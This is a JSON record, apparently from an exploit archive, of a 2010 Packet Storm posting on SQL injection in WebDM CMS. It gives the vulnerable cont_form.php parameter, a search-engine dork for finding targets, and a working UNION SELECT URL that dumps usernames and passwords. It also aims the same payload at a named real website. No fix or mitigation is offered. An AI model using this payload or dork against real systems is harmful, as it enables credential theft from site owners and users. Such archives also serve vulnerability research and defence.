{"id": "PACKETSTORM:91312", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WebDM CMS SQL Injection", "description": "", "published": "2010-06-30T00:00:00", "modified": "2010-06-30T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/91312/WebDM-CMS-SQL-Injection.html", "reporter": "Cr3w-D", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:18:07", "viewCount": 8, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/91312/webdm-sql.txt", "sourceData": "`WebDM CMS SQL Injection Vulnerability \n \n* EDB-ID: \n* CVE: \n* OSVDB-ID: \n* Author: Dr.0rYX and Cr3w-DZ \n* Published: \n* Verified: \n* Exploit Code: \n* Vulnerable App: \n \n**************************************************************************************************** \n* _______ ___________.__ ___________ .__ * \n* ____ \\ _ \\______\\__ ___/| |__ _____ \\_ _____/______|__| ____ _____ * \n* / \\/ /_\\ \\_ __ \\| | | | \\ ______ \\__ \\ | __) \\_ __ \\ |/ ___\\\\__ \\ * \n* | | \\ \\_/ \\ | \\/| | | Y \\ /_____/ / __ \\_| \\ | | \\/ \\ \\___ / __ \\_ * \n* |___| /\\_____ /__| |____| |___| / (____ /\\___ / |__| |__|\\___ >____ / * \n* \\/ \\/ \\/ \\/ \\/ \\/ \\/ * \n* .__ __ __ * \n* ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * \n* / ___// __ \\_/ ___\\| | \\_ __ \\ \\ __< | | \\ __\\/ __ \\\\__ \\ / \\ * \n* \\___ \\\\ ___/\\ \\___| | /| | \\/ || | \\___ | | | \\ ___/ / __ \\| Y Y \\ * \n* /____ >\\___ >\\___ >____/ |__| |__||__| / ____| |__| \\___ >____ /__|_| / * \n* \\/ \\/ \\/ \\/ \\/ \\/ \\/ * \n* Pr!v8 Expl0iT AND t00l ** * \n* ALGERIAN HACKERS * \n*********************************- NORTH-AFRICA SECURITY TEAM -************************************* \n \n[!] WebDM CMS SQL Injection Vulnerability \n[!] Author : Dr.0rYX and Cr3w-DZ \n[!] MAIL : vx3@hotmail.de<mailto:vx3@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> \n \n***************************************************************************/ \n \n[ Software Information ] \n \n[+] Vendor : http://www.internetdm.co.uk/ \n[+] script : WebDM CMS \n[+] Download : http://www.internetdm.co.uk/site/cont_form.php?cf_id=1&fid=0,333 (sell script ) \n[+] Vulnerability : SQL injection \n[+] Dork : inurl:\"cont_form.php?cf_id=\" \n \n**************************************************************************/ \n[ Vulnerable File ] \n \nhttp://server/[path]/cont_form.php?cf_id=[N.A.S.T ] \n \nhttp://server/cont_form.php?cf_id=[N.A.S.T ] \n \n[ Exploit ] \n \nhttp://server/[path]/cont_form.php?cf_id=-1+union+select+1,2,3,4,5,6,7,8,Group_concat(uname,0x3a,pword),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+tblstr-- \n \n \n[ ExAMPLE ] \n \nhttp://www.theroniere.com/site/cont_form.php?cf_id=-1+union+select+1,2,3,4,5,6,7,8,Group_concat(uname,0x3a,pword),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+tblstr-- \n \n[ GReet ] \n \n[+] :claw , Exploit-db.com ,Inj3ct0r.com , ALL HACKERS MUSLIMS \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647550703}}

{}